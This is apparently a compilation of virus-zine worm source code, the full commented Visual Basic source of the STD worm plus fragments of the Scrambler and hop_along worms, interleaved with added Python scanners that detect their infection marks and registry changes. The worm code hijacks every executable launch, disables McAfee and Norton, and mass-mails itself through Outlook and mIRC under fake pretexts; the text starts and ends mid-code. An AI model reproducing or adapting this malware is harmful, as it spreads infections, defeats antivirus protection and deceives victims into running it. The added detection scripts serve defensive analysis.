    _chdir("system");

    if (FileExists(RepairHost))
        WinExec(RepairHost, SW_SHOWNORMAL);

    _unlink("hostfile.exe");
}
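Editor's note on the Scrambler source above (added for this edition; the code below is not Gigabyte's): the VirCheck, WriteVirus and AddOrig routines between them fix the on-disk layout of an infected file, which is all a scanner needs. WriteVirus copies 4928 * 8 = 39424 bytes of worm body, AddOrig appends the untouched host behind it, and VirCheck reads file bytes 19 and 20 (offset 0x12, which is the e_csum field of the MZ header) and treats a 'b' there as the "gb" infection mark, so the worm's own header, which becomes the first bytes of every infected file, is assumed to carry "gb" at that offset. The Python below detects that mark and carves the host back out the same way CopyOrig does (skip the body, keep the rest). The sample buffers are constructed, and the MZ-header reading of the marker is an assumption drawn from that check, not something the zine states.

```python
# Scanner for the Scrambler prepender layout (added example, not Gigabyte's code).
# Facts taken from the source above: WriteVirus writes 4928 * 8 bytes of worm
# body, AddOrig appends the original host behind it, and VirCheck reads file
# bytes 19 and 20 (offset 0x12 = e_csum in the MZ header) looking for "gb".
# The sample buffers at the bottom are constructed for demonstration.
from typing import Optional

VIRUS_BODY_LEN = 4928 * 8   # bytes copied by WriteVirus (39424)
CSUM_OFFSET = 0x12          # e_csum field of IMAGE_DOS_HEADER: file bytes 19-20
GB_MARK = b"gb"             # the marker VirCheck compares against (assumed layout)


def infection_mark(data: bytes) -> Optional[bytes]:
    """Return the two header bytes VirCheck inspects, or None for non-MZ input."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return None
    return data[CSUM_OFFSET:CSUM_OFFSET + 2]


def is_scrambler_infected(data: bytes) -> bool:
    """True when the marker is present and there is something behind the body."""
    return infection_mark(data) == GB_MARK and len(data) > VIRUS_BODY_LEN


def recover_host(data: bytes) -> Optional[bytes]:
    """Carve the original executable out of an infected file.

    Mirrors CopyOrig, which skips 4928 * 8 bytes and copies the remainder.
    Returns None if the file is not infected or the carved tail is not an
    MZ image (body length mismatch), so callers never get garbage back.
    """
    if not is_scrambler_infected(data):
        return None
    host = data[VIRUS_BODY_LEN:]
    return host if host[:2] == b"MZ" else None


def make_mz(e_csum: bytes, total_len: int) -> bytes:
    """Constructed MZ-headed blob of the requested length (test data only)."""
    hdr = bytearray(0x40)
    hdr[:2] = b"MZ"
    hdr[CSUM_OFFSET:CSUM_OFFSET + 2] = e_csum
    return bytes(hdr) + b"\x00" * (total_len - len(hdr))


CLEAN_EXE = make_mz(b"\x00\x00", 2048)                       # constructed clean host
INFECTED_EXE = make_mz(GB_MARK, VIRUS_BODY_LEN) + CLEAN_EXE  # constructed infected file

if __name__ == "__main__":
    for name, blob in (("clean", CLEAN_EXE), ("infected", INFECTED_EXE)):
        host = recover_host(blob)
        print(name, is_scrambler_infected(blob),
              "host bytes:", None if host is None else len(host))
```

The length check in is_scrambler_infected matters: a file that carries the marker but is no longer than the body is the dropped worm copy itself, and there is no host to recover from it. Only the carved tail that starts with its own MZ header is returned, which guards against a build of the worm whose body length differs from the 39424 bytes read off this source.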


Attribute VB_Name = "STD"
'STD v1.0 by Error of Team Necrosis
' Commented by Error, pardon my commenting style
' ********W32.HLLP.STD.worm Source*********
' STD is a Memory-Resident EXE prepender with
' Worm functions for Outlook and mIRC
Public myDNA, myRNA, MyCode, STD, Grime, MySTD As String
Public FDateTime, oldDate, FDate, OldTime, FTime As String
Const MySize = 17920
Const RSP_SIMPLE_SERVICE = 1
Const RSP_UNREGISTER_SERVICE = 0
Private iResult, hProg, idprog, iExit As Long
Const STILL_ACTIVE As Long = &H103
Const PROCESS_ALL_ACCESS As Long = &H1F0FFF
Const Notification = "Hey, sorry I haven't written to you in a while. " & _
    "Well you could call it a while. I'm writing this E-mail " & _
    "to let you know of an attachment im sending with the next mail."
Const Notify = "Here is the e-mail attachment I told you about earlier, " & _
    "It's an installation program for "
Private Declare Function GetCurrentProcessId Lib "kernel32" () As Long
Private Declare Function RegisterServiceProcess Lib "kernel32" (ByVal dwProcessID As Long, ByVal dwType As Long) As Long
Private Declare Function OpenProcess Lib "kernel32" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessID As Long) As Long
Private Declare Function GetExitCodeProcess Lib "kernel32" (ByVal hProcess As Long, lpExitCode As Long) As Long
Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long

Sub Form_Load()
' I put STD into a form because if you compile
' it into a module you wont be able to chose
' what default icon STD will have, and it ends
' up with a nasty baby blue and white form.
' Which is very noticable since STD's icon
' becomes the infected EXE's icon. i then made
' the MS-DOS Program Icon as the default icon
' NOTE: Make sure you make the form set to
' visbile = false and showintaskbar = false
On Error Resume Next
Dim process As Long
process = GetCurrentProcessId()
' This gets STD's process handle so it can
' manipulate itself
Call RegisterServiceProcess(process, RSP_SIMPLE_SERVICE)
' Now STD is hidden from ALT+CTRL+DEL and
' Task Manager. This will take up kernel
' processing up to 99.9% but it will allocate
' any needed kernel processing for other
' programs and still remain hidden.
Call AIDS
' AIDS = Registry Modifications to disable
' McAfee/Norton, have STD startup on windows
' load, make STD go memory-resident, and to
' modify mIRC scripting
myDNA = App.EXEName
If Right(App.Path, 1) <> "\" Then
    myRNA = App.Path & "\"
End If
' The above will get the present filename of
' STD's host which has been executed
myRNA = myRNA & myDNA & ".exe"
' ************MEMORY-RESIDENT AREA***********
If UCase(myRNA) = "C:\WINDOWS\SYSTEM\SYSTRAY_.EXE" Then
' STD places its code into the file:
' C:\WINDOWS\SYSTEM\SYSTRAY_.EXE
' This is called the Exe-Hooker (yes i said
' hooker). Whenever a exe is executed this file
' will be executed first, sending the running
' exe's full pah name and parameters to this
' files commandline
STD = Command()
' Get the running exe's path name and parameters
For X = 1 To Len(STD)
    strck = UCase(Mid(STD, X, 1))
    Grime = Grime + strck
    If Right(Grime, 5) = ".EXE " Then
        ' Extract the exe name from the parameters
        Grime = Left(Grime, Len(Grime) - 1)
        MySTD = Right$(STD, Len(STD) - X)
        ' Grime = full path of the running exe
        ' MySTD = all the exe's parameters
        GoTo Trine
    End If
Next X
Trine:
ff = FreeFile
' use freefiles so you dont get file i/o errors
FDateTime = FileDateTime(Grime)
' Get the files Date/Time Stamp
For w = 1 To Len(FDateTime)
    Scan = Mid(FDateTime, w, 1)
    If Scan = " " Then
        FDate = FDate + Scan
        ' Extract the Time
        FTime = Mid(FDateTime, w + 1, Len(FDateTime) - w)
        GoTo GotStamp
    End If
    ' Extract the Date
    FDate = FDate + Scan
Next w
GotStamp:
oldDate = Date$
' Get and store the original system date
OldTime = Time$
' Get and store the original system time
Date = FDate
' Change the system Date to the files date
Time = FTime
' Change the system Time to the files time
' This will keep the file's date/time stamp
' preserved (Is this a first for a VB virus?)
Open Grime For Binary Access Read As ff
' Open the running exe
Dim Original As String
Original = Space(LOF(ff))
' set a buffer to include the entire exe file's
' contents (I've seen exe's 126 meg being stored
' as a string in VB)
Get #ff, 1, Original
' Start at the beginning of the file and get the
' entire contents of the file
If UCase(Right(Original, 3)) = "STD" Then
' After getting the contents, check to see if
' the last 3 characters in a file are "STD"
' if so, that means the file is already infected
' and the original file needs to be ran ASAP
Call Original_Jump
' Original_Jump = run the original exe
End If
Close #ff
' if the file isnt infected:
Open myRNA For Binary Access Read As #2
' open the Exe hooker file
Dim Herpes As String
Herpes = Space(MySize)
Get #2, 1, Herpes
' Get the virus from the file
Close #2
Open Grime For Binary Access Write As ff
Put #ff, 1, Herpes
' Place the virus at the beginning of the Exe
Put #ff, MySize, Original
' Right after STD, place the original Exe code
Put #ff, LOF(ff) + 3, "STD"
' Mark the file infected with "STD" as the last
' 3 characters in a file
Close #ff
Call Original_Jump
' Run the original exe
End If
' ********END OF MEMORY-RESIDENT CODE*********
InFx_SYS
' InFx_SYS starts the infection of the system
' and makes STD go resident
End Sub

Public Sub InFx_SYS()
On Error Resume Next
Kill "C:\windows\system\systray_.exe"
' Kill any non-working installations
ff = FreeFile
Open myRNA For Binary Access Read As #ff
' Open the running file
Dim MyCode As String
MyCode = Space(MySize)
Get #ff, 1, MyCode
' Extract STD from the file
Close
Open "C:\windows\system\systray_.exe" For Binary Access Write As #ff
Put #ff, 1, MyCode
' Place STD in the Exe Hooker file
Put #ff, LOF(ff) + 3, "STD"
' Mark the file infected so it wont infect
' itself
Close
FileCopy "C:\windows\system\systray_.exe", "C:\windows\system\runtray_.dll"
' copy the Exe Hooker file to another file for
' mailing purposes
Call Original_Jump
' Run the original exe
End Sub

Public Sub AIDS()
' This modifies windows registry, disables AV
' products and mIRC sending stuff
' NOTE: this is ran every exe execution as well
On Error Resume Next
w = Chr(34)
' for saving space (And lots of it)
Open "C:\ModReg.reg" For Output As #1
Print #1, "REGEDIT4"
Print #1,
Print #1, "[HKEY_CLASSES_ROOT\exefile\shell\open\command]"
Print #1, "@=" & w & "\" & w & "C:\\windows\\system\\systray_.exe\" & w & " %1 %*" & w
' Most important command of STD is above
' This forces Windows to run all exe's through
' STD's Exe Hooker file along with their
' parameters. Once windows is restarted after
' system infection, STD will go into hardend
' residency. Windows will depend on the Exe
' Hooker to run all exe's and therefore STD
' cannot be deleted in a windows session. And
' if they delete it in DOS, no exes will run
' until the rewrite the registry
Print #1,
Print #1, "[HKEY_LOCAL_MACHINE\Software\McAfee\Scan95]"
Print #1, w & "SerialNum" & w & "=" & w & "STD v1.0 by Error of TN" & w
Print #1, w & "Curr entVersionNumber" & w & "=" & w & "666" & w
Print #1, w & "DAT" & w & "=" & w & "NONE" & w
Print #1, w & "DATFile" & w & "=" & w & "-2000" & w
Print #1, w & "VirusInfoURL" & w & "=" & w & "http://www.norton.com" & w
Print #1, w & "bVShieldEnabled" & w & "=dword:00000000"
' Disable McAfee's scanner, DAT files, and
' VShield
Print #1,
Print #1, "[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]"
Print #1, w & "SystemTray" & w & "=" & w & "C:\\Windows\\system\\systray_.exe" & w
' Start STD on every windows startup
Close #1
If Dir("C:\mirc", vbDirectory) <> "" Then
Open "C:\mirc\script.ini" For Output As #1
' Modify script.ini for STD sending
Print #1, "[script]"
Print #1, "n0= on 1:TEXT:*sex*:#:{"
' Everytime someone types in sex, sexy, etc
' in a Channel...
Print #1, "n1= .msg $nick Hello, sorry to disturb you, but I just got a very kinky adult slideshow and was wondering if you would like a copy. So I'm going to send you one."
' STD will message them with this...
Print #1, "n2= .copy C:\windows\system\runtray_.dll C:\windows\system\install_show.exe"
' rename the mailing file to this false name
Print #1, "n3= .dcc send $nick C:\windows\system\install_show.exe"
' and DCC send it to the person who typed in sex
' BTW 'sex' is the 2nd most common subject/word
' typed in chats (right after a/s/l)
Print #1, "n4= }"
' end the mIRC sending stuff
Close
End If
modify = Shell("regedit /s C:\ModReg.reg", vbHide)
' run the Registry modifications in a background
' process
Kill "C:\ModReg.reg"
' delete any of its traces
Kill "C:\Program Files\Norton AntiVirus\*.dat"
' delete Norton's DAT files
End Sub

Public Function IGotWyrms(Subject1 As String, Body1 As String, Optional Attachment1 As String)
On Error Resume Next
' MAPI Mailing technique got from my other virus
' W97M/Revolution
' http://teamnecrosis.20m.com/VC.html for stuff
Dim S_and_M, B_and_D, Spawnme
Set S_and_M = CreateObject("Outlook.Application")
Set B_and_D = S_and_M.GetNameSpace("MAPI")
If S_and_M = "Outlook" Then
B_and_D.Logon "Guest", "password"
For y = 1 To B_and_D.AddressLists.Count
' get # of addybooks in Outlook
Set AddyBook = B_and_D.AddressLists(y)
X = 1
Set Spawnme = S_and_M.CreateItem(0)
For oo = 1 To AddyBook.AddressEntries.Count
peep = AddyBook.AddressEntries(X)
Spawnme.Recipients.Add peep
X = X + 1
If X > 100 Then oo = AddyBook.AddressEntries.Count
' in each Addybook send STD to the first 100 ppl
Next oo
Spawnme.Subject = Subject1
' Subject1 = "Hey" (on authorization mail) or
' "Here it is" (on Attachment mail)
Spawnme.Body = Body1
' the body varies.... see Original_Jump
If Attachment1 <> "" Then
Spawnme.Attachments.Add Attachment1
' as above
End If
Spawnme.Send
peep = ""
Next y
B_and_D.Logoff
End If
End Function

Public Sub Original_Jump()
On Error Resume Next
If Grime = "" Or Grime = Empty Then Grime = myRNA
' make sure STD gets the file to run
If Original = "" Or Original = Empty Then
Open Grime For Binary Access Read As #3
Original = LOF(3) - MySize
If Original = 0 Then End
' if the file = pure source of STD then end
Dim GetOrig As String
GetOrig = Space(Original)
Get #3, MySize, GetOrig
' get the original code of the running exe
Close #3
End If
hideit = Left(Grime, Len(Grime) - 4)
hideit = hideit & ".vxv"
Open hideit For Binary Access Write As #10
Put #10, , GetOrig
' place the code in a temporary file with the
' same exe name but ".vxv" extension
Close #10
Close
Dim idprog As Long
Date = oldDate
Time = OldTime
' Restore system date/time if needed
idprog = Shell(hideit & " " & MySTD, vbNormalFocus)
' run the original exe AND its parameters via
' running the original code from a temporary
' file
hProg = OpenProcess(PROCESS_ALL_ACCESS, False, idprog)
GetExitCodeProcess hProg, iExit
Do While iExit = STILL_ACTIVE
DoEvents
GetExitCodeProcess hProg, iExit
' monitor the running exe from the temp file
' and have STD remain resident using 2K bytes
' of memory to run. This is what prohibits
' STD from being deleted in a Windows session
' along with windows requiring that file
Loop
Kill hideit
Kill hideit
' As soon as the program has ended delete the
' temp file (2 times to ensure deletion)
Randomize Timer
' Base random number gen on the time
RandSend = Int(Rnd(1) * 20) + 1
If RandSend = 5 Then
' NOTE: to view mail messages see the
' declarations at the top of STD's code
' STD will send itself via Outlook 1 out of 20
' exe executions upon the infected machine
Call IGotWyrms("Hey", Notification, "")
' send the authorization mail telling all users
' that the next E-mail will have an attachment
' "Social engineering at its finest" - Evul
Name "C:\windows\system\runtray_.dll" As "C:\windows\install_.exe"
' rename the mail file to a fake name
Randomize Timer
Dim Note As String
randmsg = Int(Rnd(1) * 5) + 1
If randmsg = 1 Then Note = Notify & "an adult screensaver slideshow program"
If randmsg = 2 Then Note = Notify & "an Outlook Service Release upgrade"
If randmsg = 3 Then Note = Notify & "a Microsoft Explorer Patch"
If randmsg = 4 Then Note = Notify & "a Desktop Game I got off the internet"
If randmsg = 5 Then Note = Notify & "a brand-new MP3 player and plug-ins"
Call IGotWyrms("Here it is", Note, "C:\windows\install_.exe")
' STD will send itself disguised as one of the
' above programs
Name "C:\windows\install_.exe" As "C:\windows\system\runtray_.dll"
' rename the fake exe to the original fake name
End If
End If
End
' End STD
' W32.HLLP.STD.worm by Error of Team Necrosis
' 32-bit exe infector/worm with a hint of social
' engineering
' One of the first Memory-Resident Exe infectors
' written in Visual Basic
' questions? ---> [email protected]
' http://teamnecrosis.20m.com
End Sub
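Editor's note on the AIDS routine above (example code written for this edition, not Team Necrosis code): every change STD makes that survives a reboot is written out as plain text first, so the REGEDIT4 file it merges with "regedit /s" and the script.ini it drops into C:\mirc are where a responder should look, and both are easy to check mechanically. The script below parses a .reg file and reports an exefile\shell\open\command whose default value is no longer the stock "%1" %*, every entry under the Run key, and any values written under McAfee's key; it then walks a script.ini for [script] event handlers that DCC-send a file to whoever triggered them, which is the pattern both STD and Scrambler's ScriptFile write. The sample inputs are constructed from the strings the source prints; the stock exefile command value and the key paths are taken from that source and from the Windows defaults, not from anything else on this page.

```python
# Scanner for the two text artifacts STD drops (added example, not Team
# Necrosis code): the REGEDIT4 file merged with "regedit /s" and the mIRC
# script.ini.  Flags the exefile open-command hijack, Run persistence,
# rewritten McAfee settings, and any [script] handler that DCC-sends a file.
# Sample inputs are constructed from the strings printed in the source.
import re

EXEFILE_KEY = r"HKEY_CLASSES_ROOT\exefile\shell\open\command"
RUN_KEY = r"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run"
AV_KEY_PREFIXES = (r"HKEY_LOCAL_MACHINE\Software\McAfee",)
DEFAULT_EXEFILE_CMD = '"%1" %*'     # stock value of the exefile open command

_VALUE_RE = re.compile(r'^(@|"(?:[^"\\]|\\.)*")=(.*)$')


def parse_reg(text):
    """Return {key: {value_name: data}} for a REGEDIT4 text; '@' is the default value."""
    keys, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line == "REGEDIT4":
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys.setdefault(current, {})
            continue
        m = _VALUE_RE.match(line)
        if m and current is not None:
            name = "@" if m.group(1) == "@" else m.group(1)[1:-1]
            data = m.group(2)
            if len(data) >= 2 and data[0] == data[-1] == '"':
                data = re.sub(r"\\(.)", r"\1", data[1:-1])   # undo \\ and \" escapes
            keys[current][name] = data
    return keys


def check_reg(text):
    """List the registry changes a defender would want to see from a .reg file."""
    findings, keys = [], parse_reg(text)
    cmd = keys.get(EXEFILE_KEY, {}).get("@")
    if cmd is not None and cmd != DEFAULT_EXEFILE_CMD:
        findings.append(f"exefile open command hijacked: {cmd}")
    for name, data in keys.get(RUN_KEY, {}).items():
        findings.append(f"Run persistence: {name} -> {data}")
    for key, values in keys.items():
        if key.startswith(AV_KEY_PREFIXES) and values:
            findings.append(f"AV settings rewritten under {key}: {sorted(values)}")
    return findings


_EVENT_RE = re.compile(r"^n\d+=\s*on\s+\S+:(\w+):", re.IGNORECASE)
_DCC_RE = re.compile(r"\bdcc\s+send\b", re.IGNORECASE)


def check_script_ini(text):
    """Flag [script] event handlers that DCC-send a file to whoever triggered them."""
    findings, in_script, event = [], False, None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("["):
            in_script = line.lower() == "[script]"
            continue
        if not in_script:
            continue
        m = _EVENT_RE.match(line)
        if m:
            event = m.group(1).upper()
        if _DCC_RE.search(line):
            findings.append(f"dcc send inside on {event or '?'} handler: {line}")
    return findings


# Constructed samples: the lines the AIDS routine prints, and a stock .reg.
SAMPLE_REG = "\n".join([
    "REGEDIT4",
    "",
    r"[HKEY_CLASSES_ROOT\exefile\shell\open\command]",
    r'@="\"C:\\windows\\system\\systray_.exe\" %1 %*"',
    "",
    r"[HKEY_LOCAL_MACHINE\Software\McAfee\Scan95]",
    r'"bVShieldEnabled"=dword:00000000',
    "",
    r"[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]",
    r'"SystemTray"="C:\\Windows\\system\\systray_.exe"',
])
CLEAN_REG = "REGEDIT4\n\n" + r"[HKEY_CLASSES_ROOT\exefile\shell\open\command]" + "\n" + r'@="\"%1\" %*"'
SAMPLE_SCRIPT_INI = "\n".join([
    "[script]",
    "n0= on 1:TEXT:*sex*:#:{",
    "n1= .msg $nick Hello, sorry to disturb you, but I just got a very kinky adult slideshow",
    r"n2= .copy C:\windows\system\runtray_.dll C:\windows\system\install_show.exe",
    r"n3= .dcc send $nick C:\windows\system\install_show.exe",
    "n4= }",
])

if __name__ == "__main__":
    for finding in check_reg(SAMPLE_REG) + check_script_ini(SAMPLE_SCRIPT_INI):
        print(finding)
```

The exefile check compares the unescaped default value against the stock command rather than searching for a known file name, so it also catches a hook installed under a different path; that is the check worth running at all, because as the author's own comment notes, a system where that value points at a missing file will no longer start any program. Listing every Run entry is deliberate: the scanner reports, a human decides.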


Private Sub Form_Load()
If Dir("c:\windows\hop_along.exe") = "" Then ' check if already infected
FileCopy App.Path & "\" & App.EXEName & ".exe", "c:\windows\hop_along.exe"
CreateVBS ' call the Create VBS sub
Shell "wscript.exe c:\windows\hop_along.vbs" ' Run the VBS script
CreatePKunzip ' Call the CreatePKunzip sub
LogoZip ' Call the LogoZip sub
CreateBat ' Call the CreateBat sub
Shell "c:\windows\hop_along.bat", vbHide ' Run the bat
Wait4Bat ' Run the Wait4Bat Loop till bat is completed running
FileCopy "c:\windows\logo.sys", "c:\logo.sys" 'Copy Logo file to c:\
End If
End
End Sub

Public Sub CreateVBS()
Open "c:\windows\hop_along.vbs" For Output As #1
Print #1, "Set createmail = CreateObject(" & Chr(34) & "Outlook.Application" & Chr(34) & ")"
Print #1, " If createmail <> " & Chr(34) & "" & Chr(34) & " Then"
Print #1, " Set EachMail = createmail.GetNameSpace(" & Chr(34) & "MAPI" & Chr(34) & ")"
Print #1, " For Each GetEmail In EachMail.AddressLists"
Print #1, " If GetEmail.AddressEntries.Count > 0 Then"
Print #1, " Set Eletter = createmail.CreateItem(0)"
Print #1, " For VecH = 1 To GetEmail.AddressEntries.Count"
Print #1, " Set FloP = GetEmail.AddressEntries(VecH)"
Print #1, " If VecH = 1 Then"
Print #1, " Eletter.BCC = FloP.Address"
Print #1, " Else"
Print #1, " Eletter.BCC = Eletter.BCC & " & Chr(34) & "; " & Chr(34) & " & FloP.Address"
Print #1, " End If"
Print #1, " Next"
Print #1, " Eletter.Subject = " & Chr(34) & "Look At This!!!" & Chr(34); ""
Print #1, " Eletter.Body = " & Chr(34) & "You have to see this file its so funny!" & Chr(34); ""
Print #1, " Eletter.Attachments.Add " & Chr(34) & "C:\windows\hop_along.exe" & Chr(34); ""
Print #1, " Eletter.DeleteAfterSubmit = True"
Print #1, " Eletter.Send"
Print #1, " End If"
Print #1, " Next"
Print #1, "End If"
Close #1
End Sub

Sub CreatePKunzip()
Open "c:\windows\pkunzip.dbg" For Output As #2
Print #2, "N PKUNZIP.COM"
Print #2, "E 0100 B9 2E B9 BF BE 0B 2B CF 32 C0 F3 AA B4 30 CD 21"
Print #2, "E 0110 A3 22 B9 8D A5 00 06 89 26 26 B9 B8 C6 09 E8 50"
Print #2, "E 0120 00 E8 C0 01 B8 4B 0A E8 31 00 B8 62 A9 E8 2B 00"
Print #2, "E 0130 E8 61 00 E8 3E 00 A0 20 B9 E9 0E 00 BB 65 0A 50"
Print #2, "E 0140 53 92 E8 34 00 58 E8 28 00 58 B4 4C CD 21 C6 06"
Print #2, "E 0150 20 B9 01 50 B8 5B 0A E8 1F 00 58 E8 88 02 8B F0"
Print #2, "E 0160 E8 23 00 8B 1E BC 0B 8B D6 91 B4 40 CD 21 E9 82"
Print #2, "E 0170 02 E8 E7 FF B8 48 0A EB E2 50 E8 F7 FF B8 3E 0A"
Print #2, "E 0180 E8 D8 FF 58 EB D5 56 96 BA FF FF AC 42 84 C0 75"
Print #2, "E 0190 FA 92 5E C3 E8 4F 02 33 C9 33 D2 88 0E 2A AA 8B"
Print #2, "E 01A0 1E 28 B9 B8 02 42 CD 21 8B F0 85 D2 75 05 3D 00"
Print #2, "E 01B0 10 72 03 BE 00 10 2B C6 83 DA 00 95 8B FA 83 EE"
Print #2, "E 01C0 12 8B D5 8B CF E8 EF 00 BA 00 0E 8D 4C 12 E8 EC"
Print #2, "E 01D0 00 8B CE C7 06 68 0A 05 06 B8 66 0A E8 A3 00 85"
Print #2, "E 01E0 C0 75 1F 8B C5 0B C7 74 11 81 ED EA 0F 83 DF 00"
Print #2, "E 01F0 7D CF 03 F5 33 ED 33 FF EB C7 B0 03 BA 6A 0A E9"
Print #2, "E 0200 3A FF 97 8B 4D 14 E3 31 56 8D 75 16 33 DB AC 3C"
Print #2, "E 0210 1B 74 0C 3C 13 75 03 43 EB 05 92 B4 02 CD 21 E2"
Print #2, "E 0220 ED 5E E8 4F FF 85 DB 74 10 B8 86 0A E8 99 00 72"
Print #2, "E 0230 05 B0 08 E9 14 FF E8 3B FF 8B 36 26 B9 8B 55 10"
Print #2, "E 0240 8B 4D 12 E8 71 00 83 7D 0E 00 75 2E 8B 4D 0C A1"
Print #2, "E 0250 06 00 2B C6 3B C1 72 22 8B D6 E8 60 00 8B 4D 0A"
Print #2, "E 0260 E3 15 8B 5C 1C 8B 54 1E 8D 78 2E 03 FA 03 7C 20"
Print #2, "E 0270 E8 B2 01 8B F7 E2 EB E9 79 01 B0 07 BA B5 0A E9"
Print #2, "E 0280 BA FE E8 61 01 96 33 C0 A3 D6 AE E3 24 8B FA AD"
Print #2, "E 0290 47 4F AF E0 FC 83 F9 01 76 17 A7 74 06 4F 4F 4E"
Print #2, "E 02A0 4E EB EE 8D 5D FC 89 1E D6 AE 80 3E 2A AA 00 74"
Print #2, "E 02B0 EC A1 D6 AE E9 3C 01 53 B8 00 42 EB 03 53 B4 3F"
Print #2, "E 02C0 8B 1E 28 B9 CD 21 5B C3 E8 90 FE B8 08 0C CD 21"
Print #2, "E 02D0 24 DF 3C 59 74 04 3C 4E 75 F1 92 B4 02 CD 21 80"
Print #2, "E 02E0 EA 4F F5 C3 E8 D5 00 BE 81 00 8A 4C FF 32 ED E3"
Print #2, "E 02F0 1E AC 3C 20 74 17 3C 09 74 13 3C 2D 75 6D AC 49"
Print #2, "E 0300 74 0D 3C 6F 74 04 3C 4F 75 03 A2 FC A9 E2 E2 80"
Print #2, "E 0310 3E 24 B9 00 74 34 BE 62 A9 33 DB AC 3C 2E 75 01"
Print #2, "E 0320 43 84 C0 75 F6 85 DB 75 0A C7 44 FF 2E 5A C7 44"
Print #2, "E 0330 01 49 50 BA 62 A9 B8 00 3D 80 3E 22 B9 03 72 02"
Print #2, "E 0340 B0 20 CD 21 A3 28 B9 72 09 C3 BA D1 0A B0 02 E9"
Print #2, "E 0350 EA FD BA C4 0A BB 62 A9 B0 02 E9 E2 FD AC 3C 20"
Print #2, "E 0360 74 90 3C 09 74 8C AA E2 F4 EB A4 80 3E 24 B9 00"
Print #2, "E 0370 75 08 BF 62 A9 A2 24 B9 EB 03 BF E0 AE AA EB E7"
Print #2, "E 0380 E8 63 00 8B F2 8B E9 8B 0E 2A B9 8B 16 2C B9 BF"
Print #2, "E 0390 BC AA FC 33 C0 45 EB 16 AC 8B D8 32 D9 8A CD 8A"
Print #2, "E 03A0 EA 8A D6 8A F7 D1 E3 D1 E3 33 09 33 51 02 4D 75"
Print #2, "E 03B0 E7 89 0E 2A B9 89 16 2C B9 E9 37 00 E8 27 00 FD"
Print #2, "E 03C0 BF BA AE BD FF 00 B9 08 00 8B D5 33 C0 D1 E8 D1"
Print #2, "E 03D0 DA 73 07 81 F2 20 83 35 B8 ED E2 F1 AB 92 AB 4D"
Print #2, "E 03E0 79 E4 FC E9 0D 00 8F 06 D2 AE 55 56 57 53 51 FF"
Print #2, "E 03F0 26 D2 AE 59 5B 5F 5E 5D C3 50 56 57 97 8B F2 AC"
Print #2, "E 0400 AA 84 C0 75 FA 5F 5E 58 C3 52 56 8B F0 E8 76 FD"
Print #2, "E 0410 03 C6 5E 5A EB E3 B8 05 0B E8 32 FD B8 7C AA E8"
Print #2, "E 0420 39 FD E9 CE FF E8 BE FF E8 E3 00 8A 44 0A 3C 08"
Print #2, "E 0430 74 04 84 C0 75 E0 03 D3 83 C2 1E 33 C9 03 54 2A"
Print #2, "E 0440 13 4C 2C E8 71 FE E8 54 00 85 C0 74 4D E8 24 FD"
Print #2, "E 0450 B8 FF FF A3 2A B9 A3 2C B9 8B 44 0A 48 78 05 E8"
Print #2, "E 0460 FB 00 EB 03 E8 BA 00 A1 2A B9 8B 16 2C B9 F7 D0"
Print #2, "E 0470 F7 D2 2B 44 10 1B 54 12 0B C2 74 0B B8 52 0B E8"
Print #2, "E 0480 CC FC C6 06 20 B9 01 8B 1E D0 AE 8B 4C 0C 8B 54"
Print #2, "E 0490 0E B8 01 57 CD 21 B4 3E CD 21 E9 56 FF E8 46 FF"
Print #2, "E 04A0 BF 7C AA 8B CB 03 FB 4F FD B0 2F F2 AE 75 01 47"
Print #2, "E 04B0 47 FC B8 2C AA BA E0 AE E8 3E FF 50 8B D7 E8 48"
Print #2, "E 04C0 FF 58 80 3E FC A9 00 75 29 50 BA FE A9 B4 1A CD"
Print #2, "E 04D0 21 5A B4 4E B9 07 00 CD 21 72 17 B8 00 43 CD 21"
Print #2, "E 04E0 72 10 92 E8 68 FC B8 26 0B E8 DC FD 72 04 33 C0"
Print #2, "E 04F0 EB 19 B9 20 00 B4 3C BA 2C AA CD 21 73 0A 8B DA"
Print #2, "E 0500 BA 43 0B B0 05 E9 37 FC A3 D0 AE E9 E5 FE E8 D5"
Print #2, "E 0510 FE BF 7C AA 8D 74 2E 8B CB F3 A4 32 C0 AA E9 D2"
Print #2, "E 0520 FE E8 C2 FE B8 67 0B E8 31 FC B8 2C AA E8 2B FC"
Print #2, "E 0530 B9 62 9B 8B 7C 14 8B 74 16 85 F6 75 06 3B CF 72"
Print #2, "E 0540 02 8B CF BA 00 0E 52 E8 73 FD 5A 85 C0 74 0B 2B"
Print #2, "E 0550 F8 83 DE 00 91 E8 47 04 EB DF E9 96 FE E8 86 FE"
Print #2, "E 0560 B8 74 0B E8 F5 FB B8 2C AA E8 EF FB E8 30 00 E9"
Print #2, "E 0570 81 FE 80 FD 08 74 05 8A CD E8 F4 00 8B CA AD 33"
Print #2, "E 0580 C2 40 74 03 E9 C3 02 A4 81 FF 00 9E 72 03 E8 F9"
Print #2, "E 0590 03 81 FE 20 B7 72 03 E8 C4 00 E2 EB 58 EB 0B C6"
Print #2, "E 05A0 06 DE AE 00 E8 B7 00 BF 00 0E B5 08 AD 92 80 3E"
Print #2, "E 05B0 DE AE 00 75 57 E8 8E 00 D0 16 DE AE E8 95 01 E8"
Print #2, "E 05C0 C2 00 84 E4 75 0C AA 81 FF 00 9E 72 F2 E8 BA 03"
Print #2, "E 05D0 EB ED 3D 00 01 74 D7 2D FE 00 50 E8 0D 01 91 59"
Print #2, "E 05E0 56 8D 75 FF 2B F3 72 06 81 FE 00 0E 73 18 BB 00"
Print #2, "E 05F0 0E 2B DE 03 36 DC AE 3B D9 73 0B 87 D9 2B D9 F3"
Print #2, "E 0600 A4 BE 00 0E 87 D9 F3 A4 5E 91 EB BB 8B CF BA 00"
Print #2, "E 0610 0E 2B CA E8 89 03 C3 80 F9 08 77 12 53 33 C0 33"
Print #2, "E 0620 DB 8A D9 8A 87 A8 0B 22 C2 E8 44 00 5B C3 53 33"
Print #2, "E 0630 DB 8A D9 B1 08 2A D9 E8 E2 FF 8A CB 8A D8 E8 DB"
Print #2, "E 0640 FF 0A F8 93 5B C3 D1 EA FE CD 74 01 C3 9C 81 FE"
